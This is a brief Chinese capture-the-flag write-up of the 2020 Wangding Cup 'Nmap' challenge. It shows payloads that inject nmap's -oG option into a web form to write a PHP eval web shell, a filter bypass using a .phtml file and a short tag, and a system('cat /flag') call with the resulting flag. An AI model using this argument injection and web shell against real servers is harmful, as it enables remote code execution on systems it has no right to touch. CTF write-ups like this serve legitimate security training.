[网鼎杯 2020 朱雀组]Nmap

首页长这样

尝试判断是否可注入（废话，显然可以

localhost' #

' -oG shell.php <?php eval($_GET["cmd"]);?> #

Hacker...

emmm，大意了

应该是把php过滤掉了

' -oG shell.phtml <? eval($_GET["cmd"]);?> #

Host maybe down

/shell.phtml?cmd=system('cat /flag');

# Nmap 6.47 scan initiated Sun Nov 27 04:26:32 2022 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/824ef -oG shell.phtml \ flag{b868b5bd-41f0-4933-97f5-930bd42b73a3} #' # Nmap done at Sun Nov 27 04:26:33 2022 -- 0 IP addresses (0 hosts up) scanned in 0.90 seconds

氵就完事儿了.jpg

> Passions & dreams like sora, *zipped* up in my heart

[网鼎杯 2020 朱雀组]Nmap

> Passions & dreams like sora, zipped up in my heart